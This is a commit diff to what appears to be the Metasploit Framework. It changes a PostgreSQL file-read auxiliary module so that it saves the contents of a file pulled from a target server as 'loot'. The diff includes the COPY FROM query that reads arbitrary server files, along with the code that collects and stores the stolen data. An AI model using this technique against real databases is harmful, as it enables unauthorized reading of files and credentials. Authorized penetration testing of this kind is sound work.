Save the pilfered file as loot
This commit is contained in:
parent
f988622369
commit
22601180f3
|
@ -263,7 +263,7 @@ module Exploit::Remote::Postgres
|
||||||
read_query = %Q{CREATE TEMP TABLE #{temp_table_name} (INPUT TEXT);
|
read_query = %Q{CREATE TEMP TABLE #{temp_table_name} (INPUT TEXT);
|
||||||
COPY #{temp_table_name} FROM '#{filename}';
|
COPY #{temp_table_name} FROM '#{filename}';
|
||||||
SELECT * FROM #{temp_table_name}}
|
SELECT * FROM #{temp_table_name}}
|
||||||
read_return = postgres_query(read_query,true)
|
read_return = postgres_query(read_query)
|
||||||
end
|
end
|
||||||
|
|
||||||
def postgres_has_database_privilege(priv)
|
def postgres_has_database_privilege(priv)
|
||||||
|
|
|
@ -15,6 +15,7 @@ require 'msf/core'
|
||||||
class Metasploit3 < Msf::Auxiliary
|
class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
include Msf::Exploit::Remote::Postgres
|
include Msf::Exploit::Remote::Postgres
|
||||||
|
include Msf::Auxiliary::Report
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
|
@ -67,6 +68,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
print_error "#{rhost}:#{rport} Postgres - #{ret[:sql_error]}"
|
print_error "#{rhost}:#{rport} Postgres - #{ret[:sql_error]}"
|
||||||
end
|
end
|
||||||
when :complete
|
when :complete
|
||||||
|
loot = ''
|
||||||
|
ret[:complete].rows.each { |row|
|
||||||
|
print_line(row.first)
|
||||||
|
loot << row.first
|
||||||
|
}
|
||||||
|
# No idea what the actual ctype will be, text/plain is just a guess
|
||||||
|
path = store_loot('postgres.file', 'text/plain', rhost, loot, datastore['RFILE'])
|
||||||
|
print_status("#{rhost}:#{rport} Postgres - #{datastore['RFILE']} saved in #{path}")
|
||||||
vprint_good "#{rhost}:#{rport} Postgres - Command complete."
|
vprint_good "#{rhost}:#{rport} Postgres - Command complete."
|
||||||
end
|
end
|
||||||
postgres_logout if self.postgres_conn
|
postgres_logout if self.postgres_conn
|
||||||
|
|
Loading…
Reference in New Issue